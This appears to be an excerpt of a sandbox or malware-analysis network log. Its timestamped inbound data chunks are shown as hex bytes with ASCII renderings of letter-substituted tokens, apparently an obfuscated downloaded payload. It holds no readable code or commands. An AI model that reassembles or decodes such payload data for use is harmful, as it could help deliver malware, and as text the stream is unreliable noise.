2021-10-29 18:50:03 UTC	1438	IN	Data Raw: 4e 63 20 59 4e 20 59 56 20 63 72 20 57 20 4e 63 4d 20 4e 4e 49 20 4e 4e 63 20 4e 43 59 20 4e 4e 4d 20 57 20 56 43 4e 20 59 72 20 63 4c 20 49 43 20 4c 4c 20 4e 4e 43 20 4e 72 63 20 4e 4e 63 20 56 4c 49 20 72 49 20 4e 49 72 20 56 20 49 59 20 4e 4e 72 20 4e 43 43 20 4e 43 59 20 4e 72 43 20 56 4e 20 72 43 20 59 59 20 56 4c 20 49 43 20 4e 57 49 20 49 63 20 4e 43 49 20 4e 4e 56 20 4e 57 20 59 56 20 72 4c 20 4e 4e 49 20 49 59 20 4e 4e 72 20 4e 4e 63 20 4e 43 49 20 4e 49 57 20 4e 4d 20 72 57 20 59 43 20 72 4d 20 49 59 20 56 72 49 20 63 59 20 56 59 20 4e 4e 56 20 56 4d 20 59 56 20 4e 49 72 20 56 20 56 56 20 4e 4e 57 20 57 56 20 4e 43 59 20 4e 72 4e 20 72 4d 20 4e 56 4e 20 59 59 20 4c 4e 20 49 43 20 4e 56 4e 20 59 4c 20 4e 43 49 20 4e 4e 56 20 56 4d 20 59 56 20 56 Data Ascii: Nc YN YV cr W NcM NNI NNc NCY NNM W VCN Yr cL IC LL NNC Nrc NNc VLI rI NIr V IY NNr NCC NCY NrC VN rC YY VL IC NWI Ic NCI NNV NW YV rL NNI IY NNr NNc NCI NIW NM rW YC rM IY VrI cY VY NNV VM YV NIr V VV NNW WV NCY NrN rM NVN YY LN IC NVN YL NCI NNV VM YV V
2021-10-29 18:50:03 UTC	1442	IN	Data Raw: 63 20 63 4c 20 4e 56 4d 20 49 63 20 56 59 43 20 59 4c 20 56 4c 4d 20 4e 56 59 20 4e 56 4c 20 59 43 20 4d 4e 20 4e 4e 49 20 56 4e 56 20 4e 56 4d 20 63 43 20 4e 4e 4e 20 4c 63 20 4e 4e 72 20 4e 4d 63 20 63 4c 20 4e 43 4c 20 49 4e 20 56 4e 4d 20 4e 43 63 20 56 4c 72 20 4e 56 59 20 57 4e 20 59 4c 20 4e 49 72 20 56 20 49 59 20 4e 4e 72 20 56 49 20 4e 43 72 20 4d 72 20 56 72 20 59 4c 20 59 43 20 57 59 20 49 4e 20 4e 4e 43 20 57 59 20 4e 43 72 20 4e 4e 56 20 57 4e 20 59 4c 20 56 63 20 72 59 20 49 4e 20 4e 4e 72 20 56 49 20 4e 43 72 20 56 4e 4e 20 4e 4c 20 59 4c 20 59 43 20 57 59 20 49 4e 20 4e 72 57 20 57 56 20 4e 43 72 20 4e 4e 56 20 57 57 20 59 4c 20 4e 57 57 20 56 20 56 4e 49 20 4e 56 4d 20 72 20 4e 43 72 20 56 59 43 20 63 20 72 57 20 59 43 20 4d 4e 20 49 4e Data Ascii: c cL NVM Ic VYC YL VLM NVY NVL YC MN NNI VNV NVM cC NNN Lc NNr NMc cL NCL IN VNM NCc VLr NVY WN YL NIr V IY NNr VI NCr Mr Vr YL YC WY IN NNC WY NCr NNV WN YL Vc rY IN NNr VI NCr VNN NL YL YC WY IN NrW WV NCr NNV WW YL NWW V VNI NVM r NCr VYC c rW YC MN IN
2021-10-29 18:50:03 UTC	1445	IN	Data Raw: 20 4d 63 20 4e 4e 43 20 4e 56 72 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 4e 43 20 72 43 20 4c 4e 20 49 4e 20 4e 57 4c 20 4e 4e 4d 20 4c 20 4e 43 63 20 4e 4e 59 20 59 4c 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 59 72 20 4e 43 72 20 56 4e 4e 20 59 43 20 4e 4e 56 20 72 63 20 4e 56 4d 20 49 4e 20 4e 57 4c 20 4e 4e 4d 20 4e 57 20 4e 43 63 20 49 4c 20 59 4c 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 49 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 57 43 20 72 43 20 4e 49 4c 20 49 4e 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4d 4d 20 59 4c 20 4e 72 59 20 59 72 20 63 43 20 4e 4e 43 20 56 59 56 20 4e 43 72 20 4e 57 59 20 59 43 20 4e 4d 72 20 72 43 20 4e 59 4e 20 49 4e 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 72 59 20 59 4c 20 4e 4c 4d 20 Data Ascii: Mc NNC NVr NCr NWY YC NNC rC LN IN NWL NNM L NCc NNY YL NNL Yr NcV NVY Yr NCr VNN YC NNV rc NVM IN NWL NNM NW NCc IL YL NNL Yr NcV NVY VI NCr NWY YC NWC rC NIL IN rW NNM NYY NVM NMM YL NrY Yr cC NNC VYV NCr NWY YC NMr rC NYN IN rW NNM NYY NVM NrY YL NLM
2021-10-29 18:50:03 UTC	1450	IN	Data Raw: 59 20 4e 4e 63 20 4e 56 4c 20 59 43 20 4e 57 49 20 63 4e 20 56 72 63 20 4d 4d 20 4e 56 4e 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 4e 43 20 72 4e 20 59 4d 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 72 57 20 4e 4e 4c 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 4e 59 43 20 4d 4c 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 72 56 20 72 59 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 72 57 20 4e 4e 56 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 59 72 20 4d 72 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 49 20 72 63 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 59 4c 20 4e 4e 59 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 49 63 20 4d 72 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4d 49 20 72 63 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 Data Ascii: Y NNc NVL YC NWI cN Vrc MM NVN NNM NYY NVM VNC rN YM Yr NcV NVY NrW NNL YN YC NWI cN NYC ML rW NNM NYY NVM VrV rY NNL Yr NcV NVY NrW NNV YN YC NWI cN Yr Mr rW NNM NYY NVM NI rc NNL Yr NcV NVY YL NNY YN YC NWI cN Ic Mr rW NNM NYY NVM NMI rc NNL Yr NcV NVY
2021-10-29 18:50:03 UTC	1454	IN	Data Raw: 59 59 20 4e 56 4d 20 4e 4d 49 20 49 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 4e 4c 20 49 59 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 72 63 20 4e 43 49 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 56 4e 43 20 49 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 4e 4d 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 56 20 4e 43 57 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 4e 72 20 57 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 56 4e 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 4e 49 56 20 4e 43 57 20 72 57 20 4e 4e 4d 20 4e 59 59 20 4e 56 4d 20 4e 72 63 20 57 20 4e 4e 4c 20 59 72 20 4e 63 56 20 4e 56 59 20 4e 49 4e 20 49 72 20 59 4e 20 59 43 20 4e 57 49 20 63 4e 20 56 4e 72 20 4e 43 57 20 72 57 20 4e 4e 4d 20 4e 59 Data Ascii: YY NVM NMI I NNL Yr NcV NVY VNL IY YN YC NWI cN Vrc NCI rW NNM NYY NVM VNC I NNL Yr NcV NVY NNM Ir YN YC NWI cN VV NCW rW NNM NYY NVM NNr W NNL Yr NcV NVY VN Ir YN YC NWI cN NIV NCW rW NNM NYY NVM Nrc W NNL Yr NcV NVY NIN Ir YN YC NWI cN VNr NCW rW NNM NY
2021-10-29 18:50:03 UTC	1458	IN	Data Raw: 4d 20 72 4d 20 49 72 20 4e 4e 72 20 59 43 20 57 57 20 49 4c 20 72 4c 20 72 49 20 59 43 20 4e 4e 4c 20 57 4e 20 56 56 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 4e 43 4d 20 4c 4c 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 63 43 20 4e 56 72 20 49 4c 20 72 4c 20 72 49 20 59 43 20 56 57 20 49 72 20 49 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 56 4e 20 59 4e 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 63 43 20 4e 43 59 20 56 4e 56 20 72 4c 20 72 49 20 59 43 20 4e 59 20 49 4c 20 49 4e 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 43 20 59 4d 20 4e 4d 20 72 4d 20 49 72 20 4e 4e 72 20 4e 72 63 20 4e 43 56 20 49 4d 20 72 4c 20 72 49 20 59 43 20 56 56 72 20 4e 43 4d 20 4e 57 57 20 4e 43 49 20 4e 43 57 20 4e 4e 56 20 4e 63 4c 20 4e 4e 72 20 4e 4d 20 72 4d 20 49 72 20 4e Data Ascii: M rM Ir NNr YC WW IL rL rI YC NNL WN VVN NCI NCW NNV NCM LL NM rM Ir NNr NcC NVr IL rL rI YC VW Ir IN NCI NCW NNV VN YN NM rM Ir NNr NcC NCY VNV rL rI YC NY IL IN NCI NCW NNV C YM NM rM Ir NNr Nrc NCV IM rL rI YC VVr NCM NWW NCI NCW NNV NcL NNr NM rM Ir N
2021-10-29 18:50:03 UTC	1462	IN	Data Raw: 49 20 4e 49 4e 20 59 43 20 72 57 20 59 43 20 56 56 49 20 49 59 20 4e 49 4c 20 4e 4e 4d 20 4e 4e 4e 20 4e 4e 56 20 63 4e 20 59 43 20 56 72 59 20 59 72 20 49 63 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 49 59 20 59 43 20 59 72 20 59 43 20 4c 43 20 49 72 20 57 4d 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 72 43 20 59 56 20 4c 4d 20 59 72 20 56 20 4e 4e 72 20 4e 43 59 20 4e 43 59 20 4e 43 59 20 59 43 20 4e 43 56 20 59 43 20 72 43 20 49 43 20 4e 43 59 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 4e 49 20 59 56 20 72 4d 20 59 72 20 56 20 4e 4e 72 20 49 4d 20 4e 43 59 20 4e 4e 4e 20 59 43 20 4e 43 56 20 59 43 20 4e 49 20 49 43 20 49 4c 20 4e 4e 4d 20 59 57 20 4e 4e 56 20 56 43 20 59 56 20 4e 4d 20 59 72 20 4e 59 59 20 49 57 20 4e 4d 56 20 4d 43 20 4e 4e 4e 20 59 43 20 43 20 59 Data Ascii: I NIN YC rW YC VVI IY NIL NNM NNN NNV cN YC VrY Yr Ic NNr NCC NNN NIY YC Yr YC LC Ir WM NNM YW NNV rC YV LM Yr V NNr NCY NCY NCY YC NCV YC rC IC NCY NNM YW NNV NI YV rM Yr V NNr IM NCY NNN YC NCV YC NI IC IL NNM YW NNV VC YV NM Yr NYY IW NMV MC NNN YC C Y
2021-10-29 18:50:03 UTC	1466	IN	Data Raw: 72 20 56 4d 20 4e 4e 72 20 4e 4e 59 20 4e 43 57 20 4c 56 20 59 43 20 59 49 20 59 43 20 4e 43 4c 20 49 72 20 4e 56 63 20 4e 4e 4d 20 63 4c 20 4e 4e 56 20 63 56 20 72 49 20 57 4d 20 59 72 20 49 57 20 4e 4e 72 20 4c 4c 20 4e 43 57 20 4e 56 59 20 59 43 20 4e 43 4e 20 59 43 20 4c 59 20 49 72 20 4c 63 20 4e 4e 4d 20 4e 56 56 20 4e 4e 56 20 4e 43 4e 20 72 49 20 4e 57 20 59 72 20 4e 56 20 4e 4e 72 20 49 4d 20 4e 43 57 20 72 4e 20 59 43 20 4e 49 20 59 43 20 4e 43 49 20 49 72 20 49 63 20 4e 4e 4d 20 59 72 20 4e 4e 56 20 56 56 20 72 49 20 4e 4e 43 20 59 72 20 4e 4e 4c 20 4e 4e 72 20 72 43 20 4e 43 57 20 49 4d 20 59 43 20 4e 4e 43 20 59 43 20 4e 4e 59 20 49 72 20 72 59 20 4e 4e 4d 20 72 43 20 4e 4e 56 20 49 56 20 72 49 20 4e 4e 57 20 59 72 20 59 4c 20 4e 4e 72 20 72 Data Ascii: r VM NNr NNY NCW LV YC YI YC NCL Ir NVc NNM cL NNV cV rI WM Yr IW NNr LL NCW NVY YC NCN YC LY Ir Lc NNM NVV NNV NCN rI NW Yr NV NNr IM NCW rN YC NI YC NCI Ir Ic NNM Yr NNV VV rI NNC Yr NNL NNr rC NCW IM YC NNC YC NNY Ir rY NNM rC NNV IV rI NNW Yr YL NNr r
2021-10-29 18:50:03 UTC	1482	IN	Data Raw: 20 4e 4e 59 20 59 20 4e 43 4e 20 59 72 20 4d 43 20 57 72 20 59 4e 20 4e 4e 59 20 72 49 20 4e 4e 59 20 4e 72 20 56 4e 20 4d 4e 20 59 4e 20 57 59 20 59 56 20 4e 4e 4c 20 49 20 72 20 4e 4e 59 20 57 57 20 4d 72 20 63 49 20 72 43 20 59 4e 20 59 20 4c 20 72 20 63 20 4e 63 20 63 4d 20 72 57 20 72 4e 20 59 43 20 4e 4e 57 20 43 20 4e 4e 20 4e 4e 56 20 4e 43 49 20 63 63 20 72 49 20 72 43 20 59 4c 20 4e 4e 4c 20 4e 4e 4d 20 63 20 4e 72 20 4e 4d 20 59 4e 20 4e 4e 4d 20 72 43 20 59 43 20 4e 4e 49 20 43 20 59 20 4c 20 57 49 20 63 4d 20 63 72 20 72 63 20 59 43 20 4e 4e 57 20 72 20 4e 4e 59 20 4e 20 4e 43 4e 20 63 63 20 59 4e 20 49 72 20 63 49 20 4c 20 43 20 4e 4e 63 20 4e 4e 56 20 4e 4d 20 72 57 20 72 49 20 72 72 20 59 72 20 72 20 4e 20 4c 20 63 20 56 4e 20 63 63 20 63 Data Ascii: NNY Y NCN Yr MC Wr YN NNY rI NNY Nr VN MN YN WY YV NNL I r NNY WW Mr cI rC YN Y L r c Nc cM rW rN YC NNW C NN NNV NCI cc rI rC YL NNL NNM c Nr NM YN NNM rC YC NNI C Y L WI cM cr rc YC NNW r NNY N NCN cc YN Ir cI L C NNc NNV NM rW rI rr Yr r N L c VN cc c
2021-10-29 18:50:03 UTC	1498	IN	Data Raw: 4e 20 56 49 20 4e 43 56 20 49 4d 20 63 49 20 4c 57 20 56 4d 20 56 63 20 4c 20 56 59 20 57 56 20 49 4d 20 59 43 20 4e 4e 56 20 4c 49 20 56 57 20 56 72 20 72 4d 20 4e 4d 20 63 59 20 49 59 20 72 20 56 20 4d 20 63 20 4d 20 72 20 4c 43 20 49 59 20 72 49 20 4e 43 56 20 49 57 20 4d 20 63 20 4d 20 72 20 4c 43 20 49 59 20 72 49 20 4e 4e 4d 20 49 4c 20 4c 56 20 4c 4c 20 4e 20 4c 4e 20 56 59 20 57 56 20 49 4d 20 59 43 20 4e 4e 4c 20 72 57 20 63 20 63 4e 20 49 20 49 20 57 4d 20 63 49 20 63 72 20 57 59 20 59 49 20 56 4e 20 4e 4e 4d 20 63 56 20 59 20 49 43 20 63 4d 20 4d 43 20 63 49 20 63 4e 20 56 49 20 4e 49 20 4e 43 57 20 4c 59 20 4d 59 20 63 4d 20 4d 43 20 49 4c 20 59 4d 20 57 56 20 72 57 20 4c 4e 20 4e 4d 20 63 57 20 49 57 20 57 56 20 49 4e 20 49 72 20 72 57 20 56 Data Ascii: N VI NCV IM cI LW VM Vc L VY WV IM YC NNV LI VW Vr rM NM cY IY r V M c M r LC IY rI NCV IW M c M r LC IY rI NNM IL LV LL N LN VY WV IM YC NNL rW c cN I I WM cI cr WY YI VN NNM cV Y IC cM MC cI cN VI NI NCW LY MY cM MC IL YM WV rW LN NM cW IW WV IN Ir rW V
2021-10-29 18:50:03 UTC	1514	IN	Data Raw: 4d 20 57 72 20 4d 43 20 59 72 20 4e 56 20 4c 4e 20 56 59 20 72 4e 20 4c 4e 20 49 4e 20 63 57 20 57 59 20 49 4c 20 59 49 20 63 20 4e 4e 4d 20 4c 59 20 56 4e 20 4d 43 20 4d 4e 20 57 4c 20 63 49 20 63 4c 20 59 57 20 56 4d 20 56 59 20 56 4e 20 63 72 20 49 63 20 49 4c 20 49 59 20 72 57 20 72 57 20 56 63 20 43 20 43 20 57 4c 20 57 72 20 49 4d 20 49 49 20 4c 56 20 4e 4e 72 20 4c 49 20 56 43 20 4c 20 4d 43 20 49 59 20 57 59 20 56 72 20 56 4c 20 56 57 20 56 59 20 4e 20 56 4e 20 49 4e 20 63 49 20 57 4e 20 49 57 20 59 49 20 4e 20 57 4e 20 72 56 20 56 4e 20 57 56 20 49 59 20 63 72 20 57 59 20 59 59 20 57 56 20 63 43 20 72 43 20 4c 43 20 4d 4e 20 57 4c 20 49 4d 20 63 49 20 59 4c 20 63 20 56 63 20 4c 4e 20 4d 63 20 4e 4e 57 20 57 72 20 4d 43 20 57 59 20 4c 56 20 4e 4e Data Ascii: M Wr MC Yr NV LN VY rN LN IN cW WY IL YI c NNM LY VN MC MN WL cI cL YW VM VY VN cr Ic IL IY rW rW Vc C C WL Wr IM II LV NNr LI VC L MC IY WY Vr VL VW VY N VN IN cI WN IW YI N WN rV VN WV IY cr WY YY WV cC rC LC MN WL IM cI YL c Vc LN Mc NNW Wr MC WY LV NN
2021-10-29 18:50:03 UTC	1530	IN	Data Raw: 20 63 4c 20 59 43 20 4e 56 59 20 59 43 20 56 56 20 49 72 20 4c 4d 20 4e 4e 4d 20 72 20 4e 4e 56 20 57 56 20 72 49 20 57 4d 20 59 72 20 72 59 20 4e 4e 72 20 63 20 4e 43 57 20 72 20 59 43 20 49 59 20 59 43 20 57 4e 20 49 72 20 57 56 20 4e 4e 4d 20 4c 4c 20 4e 4e 56 20 57 4e 20 72 49 20 57 56 20 59 72 20 4c 4d 20 4e 4e 72 20 4d 43 20 4e 43 57 20 63 63 20 59 43 20 4e 4e 4e 20 59 43 20 57 63 20 49 72 20 56 4d 20 4e 4e 4d 20 57 20 4e 4e 56 20 49 4d 20 72 49 20 57 4c 20 59 72 20 56 4c 20 4e 4e 72 20 56 63 20 4e 43 57 20 4c 59 20 59 43 20 4d 4c 20 59 43 20 63 57 20 49 72 20 63 20 4e 4e 4d 20 49 20 4e 4e 56 20 57 59 20 72 49 20 56 49 20 59 72 20 56 72 20 4e 4e 72 20 56 49 20 4e 43 57 20 4c 43 20 59 43 20 63 59 20 59 43 20 49 49 20 49 72 20 63 20 4e 4e 4d 20 4c 4e Data Ascii: cL YC NVY YC VV Ir LM NNM r NNV WV rI WM Yr rY NNr c NCW r YC IY YC WN Ir WV NNM LL NNV WN rI WV Yr LM NNr MC NCW cc YC NNN YC Wc Ir VM NNM W NNV IM rI WL Yr VL NNr Vc NCW LY YC ML YC cW Ir c NNM I NNV WY rI VI Yr Vr NNr VI NCW LC YC cY YC II Ir c NNM LN
2021-10-29 18:50:03 UTC	1546	IN	Data Raw: 4e 43 4c 20 56 4c 4d 20 56 4e 4c 20 59 4e 20 4c 72 20 4e 4d 63 20 4c 20 63 59 20 4e 43 4c 20 4e 43 4c 20 56 4c 4d 20 56 4c 4c 20 59 4e 20 4c 4d 20 4c 56 20 4e 49 4c 20 49 4e 20 4e 4e 57 20 4e 43 4c 20 56 4c 4d 20 56 43 57 20 4c 56 20 4e 4d 4d 20 59 57 20 72 56 20 4d 56 20 57 63 20 56 72 59 20 4e 59 63 20 4e 43 43 20 59 43 20 59 56 20 4c 56 20 4e 49 43 20 4e 56 4e 20 57 57 20 56 72 4d 20 57 56 20 4e 56 63 20 4c 56 20 4e 4d 4d 20 59 57 20 4c 59 20 4d 43 20 56 72 56 20 56 43 49 20 4e 43 49 20 57 49 20 4e 4d 63 20 59 20 4c 72 20 4c 59 20 4d 43 20 56 72 4c 20 4e 4e 56 20 4e 43 72 20 57 49 20 4e 4d 49 20 4e 72 59 20 4c 56 20 4e 49 4c 20 57 4c 20 4e 4e 43 20 4e 43 59 20 4e 56 4d 20 56 72 43 20 4e 57 59 20 63 43 20 4e 49 20 59 43 20 4d 4e 20 4e 4e 49 20 4e 43 56 Data Ascii: NCL VLM VNL YN Lr NMc L cY NCL NCL VLM VLL YN LM LV NIL IN NNW NCL VLM VCW LV NMM YW rV MV Wc VrY NYc NCC YC YV LV NIC NVN WW VrM WV NVc LV NMM YW LY MC VrV VCI NCI WI NMc Y Lr LY MC VrL NNV NCr WI NMI NrY LV NIL WL NNC NCY NVM VrC NWY cC NI YC MN NNI NCV
2021-10-29 18:50:03 UTC	1562	IN	Data Raw: 57 20 4e 56 20 56 57 20 49 4d 20 59 59 20 4e 4e 57 20 49 49 20 4c 56 20 56 4d 20 4e 20 56 43 20 4d 4e 20 4e 43 56 20 63 56 20 59 57 20 4e 56 43 20 59 4c 20 4c 4e 20 4e 63 20 4c 43 20 43 20 49 4c 20 49 4c 20 49 4d 20 72 49 20 4e 4d 20 56 49 20 4e 20 72 20 72 20 4d 59 20 4c 49 20 59 4e 20 59 72 20 49 59 20 4e 4e 72 20 4c 4c 20 57 57 20 4e 4e 63 20 4e 56 72 20 49 4e 20 57 59 20 49 4c 20 57 72 20 63 56 20 56 63 20 4e 72 20 4e 4d 20 57 72 20 57 57 20 4d 43 20 49 4d 20 4c 56 20 56 4c 20 4e 43 56 20 4e 43 49 20 4e 4e 56 20 59 4e 20 72 49 20 4e 43 56 20 59 63 20 49 43 20 63 43 20 56 43 20 43 20 56 4e 20 59 4c 20 4e 56 4d 20 63 59 20 4e 4e 4d 20 4c 49 20 4e 4e 20 59 20 56 59 20 4e 43 43 20 59 4e 20 72 49 20 59 4e 20 59 72 20 43 20 4e 56 72 20 4e 4e 4c 20 4c 59 20 Data Ascii: W NV VW IM YY NNW II LV VM N VC MN NCV cV YW NVC YL LN Nc LC C IL IL IM rI NM VI N r r MY LI YN Yr IY NNr LL WW NNc NVr IN WY IL Wr cV Vc Nr NM Wr WW MC IM LV VL NCV NCI NNV YN rI NCV Yc IC cC VC C VN YL NVM cY NNM LI NN Y VY NCC YN rI YN Yr C NVr NNL LY
2021-10-29 18:50:03 UTC	1578	IN	Data Raw: 63 20 59 43 20 59 20 59 43 20 4d 43 20 49 72 20 4e 63 20 4e 4e 4d 20 4e 20 4e 4e 56 20 49 63 20 72 49 20 57 43 20 59 72 20 59 72 20 4e 4e 72 20 59 43 20 4e 43 57 20 49 20 59 43 20 57 56 20 59 43 20 49 56 20 49 72 20 59 4e 20 4e 4e 4d 20 56 57 20 4e 4e 56 20 57 43 20 72 49 20 49 4c 20 59 72 20 4c 20 4e 4e 72 20 56 59 20 4e 43 57 20 56 57 20 59 43 20 4e 43 59 20 59 43 20 57 4e 20 49 72 20 4d 4e 20 4e 4e 4d 20 72 20 4e 4e 56 20 4e 43 72 20 72 49 20 57 59 20 59 72 20 4e 43 57 20 4e 4e 72 20 56 49 20 4e 43 57 20 4e 57 20 59 43 20 4e 4e 57 20 59 43 20 4d 20 49 72 20 4c 43 20 4e 4e 4d 20 59 59 20 4e 4e 56 20 4e 43 4e 20 72 49 20 4d 43 20 59 72 20 4c 63 20 4e 4e 72 20 56 56 20 4e 43 57 20 59 59 20 59 43 20 49 49 20 59 43 20 57 43 20 49 72 20 72 43 20 4e 4e 4d 20 Data Ascii: c YC Y YC MC Ir Nc NNM N NNV Ic rI WC Yr Yr NNr YC NCW I YC WV YC IV Ir YN NNM VW NNV WC rI IL Yr L NNr VY NCW VW YC NCY YC WN Ir MN NNM r NNV NCr rI WY Yr NCW NNr VI NCW NW YC NNW YC M Ir LC NNM YY NNV NCN rI MC Yr Lc NNr VV NCW YY YC II YC WC Ir rC NNM
2021-10-29 18:50:03 UTC	1594	IN	Data Raw: 4e 56 49 20 72 43 20 72 72 20 43 20 43 20 4e 43 20 4e 56 56 20 4d 20 72 72 20 63 20 72 43 20 4c 4d 20 43 20 43 20 4e 43 20 43 20 72 56 20 4e 4e 4e 20 72 59 20 43 20 43 20 4e 43 20 4c 56 20 63 49 20 43 20 43 20 43 20 4e 4e 4e 20 72 63 20 43 20 43 20 4e 43 20 4e 4e 4e 20 72 4d 20 43 20 43 20 4e 43 20 4c 56 20 43 20 43 20 43 20 43 20 4c 56 20 43 20 43 20 43 20 43 20 72 56 20 4e 4e 4e 20 72 59 20 43 20 43 20 4e 43 20 4c 56 20 4c 4e 20 43 20 43 20 43 20 4c 56 20 4e 20 43 20 43 20 43 20 4e 4e 4e 20 72 63 20 43 20 43 20 4e 43 20 72 43 20 72 49 20 43 20 43 20 4e 43 20 4e 4e 4e 20 72 57 20 43 20 43 20 4e 43 20 4c 56 20 43 20 43 20 43 20 43 20 72 56 20 4e 4e 4e 20 59 43 20 43 20 43 20 4e 43 20 72 56 20 4e 4e 4e 20 59 43 20 43 20 43 20 4e 43 20 72 43 20 59 4e 20 43 Data Ascii: NVI rC rr C C NC NVV M rr c rC LM C C NC C rV NNN rY C C NC LV cI C C C NNN rc C C NC NNN rM C C NC LV C C C C LV C C C C rV NNN rY C C NC LV LN C C C LV N C C C NNN rc C C NC rC rI C C NC NNN rW C C NC LV C C C C rV NNN YC C C NC rV NNN YC C C NC rC YN C
2021-10-29 18:50:03 UTC	1610	IN	Data Raw: 59 4d 20 4c 4d 20 4c 56 20 56 63 20 43 20 43 20 43 20 4c 4e 20 59 4c 20 4e 59 4d 20 4c 4d 20 4c 56 20 56 63 20 43 20 43 20 43 20 4c 4e 20 59 4e 20 4e 59 4d 20 4c 4d 20 4c 56 20 56 63 20 43 20 43 20 43 20 4c 4e 20 4e 43 43 20 4e 59 4d 20 4c 4d 20 4c 56 20 56 63 20 43 20 43 20 43 20 4c 4e 20 59 4c 20 4e 59 4d 20 4c 4d 20 4c 4e 20 56 63 20 4c 4e 20 72 49 20 4e 59 4d 20 4c 4d 20 4c 56 20 56 59 20 43 20 43 20 43 20 4c 4e 20 72 57 20 4e 59 4d 20 4c 4d 20 4c 56 20 56 59 20 43 20 43 20 43 20 4c 4e 20 72 57 20 4e 59 4d 20 4c 4d 20 4c 56 20 56 59 20 43 20 43 20 43 20 4c 4e 20 57 4d 20 4e 59 4d 20 4c 4d 20 4c 56 20 56 59 20 43 20 43 20 43 20 4c 4e 20 4e 43 43 20 4e 59 4d 20 4c 4d 20 4c 4e 20 56 59 20 4c 4e 20 72 49 20 4e 59 4d 20 4c 4d 20 4c 56 20 56 72 20 43 20 43 Data Ascii: YM LM LV Vc C C C LN YL NYM LM LV Vc C C C LN YN NYM LM LV Vc C C C LN NCC NYM LM LV Vc C C C LN YL NYM LM LN Vc LN rI NYM LM LV VY C C C LN rW NYM LM LV VY C C C LN rW NYM LM LV VY C C C LN WM NYM LM LV VY C C C LN NCC NYM LM LN VY LN rI NYM LM LV Vr C C
2021-10-29 18:50:03 UTC	1626	IN	Data Raw: 4e 43 56 20 4e 4e 4e 20 4e 4e 72 20 4e 43 57 20 57 4d 20 4e 4e 43 20 57 57 20 4e 43 4e 20 49 4d 20 4e 43 59 20 4e 56 56 20 57 4d 20 4e 4e 72 20 4e 43 43 20 43 20 49 56 20 4e 4e 4d 20 4e 4e 43 20 49 4d 20 4e 43 59 20 4e 56 56 20 57 4d 20 4e 4e 72 20 4e 43 43 20 43 20 4e 4e 56 20 57 4d 20 4e 4e 59 20 4e 4e 59 20 4e 4e 57 20 4e 4e 4e 20 4e 4e 72 20 4e 43 43 20 43 20 49 56 20 4e 43 4e 20 4e 4e 56 20 4e 43 49 20 57 4d 20 57 57 20 4e 43 4e 20 43 20 4d 4e 20 4e 43 4e 20 4e 4e 63 20 49 4c 20 4e 43 4e 20 4e 4e 72 20 4e 4e 49 20 4e 43 59 20 57 57 20 4e 43 4e 20 43 20 4e 43 4c 20 4e 43 4e 20 4e 4e 63 20 57 59 20 4d 4c 20 4e 4e 43 20 4e 4e 59 20 4e 4e 63 20 57 4d 20 4e 4e 43 20 57 57 20 4e 43 4e 20 43 20 49 72 20 4e 43 4e 20 4e 4e 59 20 4e 4e 63 20 49 72 20 4e 56 4e Data Ascii: NCV NNN NNr NCW WM NNC WW NCN IM NCY NVV WM NNr NCC C IV NNM NNC IM NCY NVV WM NNr NCC C NNV WM NNY NNY NNW NNN NNr NCC C IV NCN NNV NCI WM WW NCN C MN NCN NNc IL NCN NNr NNI NCY WW NCN C NCL NCN NNc WY ML NNC NNY NNc WM NNC WW NCN C Ir NCN NNY NNc Ir NVN
2021-10-29 18:50:03 UTC	1642	IN	Data Raw: 4d 20 59 20 43 20 4e 20 56 20 4e 49 20 72 4e 20 4e 59 20 43 20 72 20 4e 20 4e 49 20 4c 4d 20 56 4e 20 4e 49 20 72 59 20 4e 20 4e 49 20 72 57 20 4e 49 20 59 4c 20 4e 49 20 59 4d 20 63 20 43 20 4e 20 4e 4d 20 63 4e 20 4e 49 20 4c 4d 20 59 20 43 20 4e 20 56 20 4e 49 20 63 59 20 72 20 43 20 43 20 4e 49 20 63 57 20 57 20 43 20 4c 20 4e 20 4e 49 20 63 59 20 4e 63 20 56 20 4e 63 20 56 20 4d 20 43 20 56 20 4e 20 4e 49 20 63 57 20 4e 49 20 63 59 20 72 20 43 20 4e 20 4e 20 4e 72 20 4c 20 63 20 56 57 20 59 20 4c 20 63 20 4e 4d 20 59 63 20 72 20 4c 56 20 43 20 56 57 20 59 20 59 20 4c 56 20 4e 20 4e 20 56 57 20 59 20 72 20 4c 56 20 4e 20 4e 20 4e 72 20 63 20 4c 56 20 4e 20 56 57 20 59 20 56 57 20 59 20 72 20 43 20 43 20 56 57 20 59 20 4c 20 43 20 43 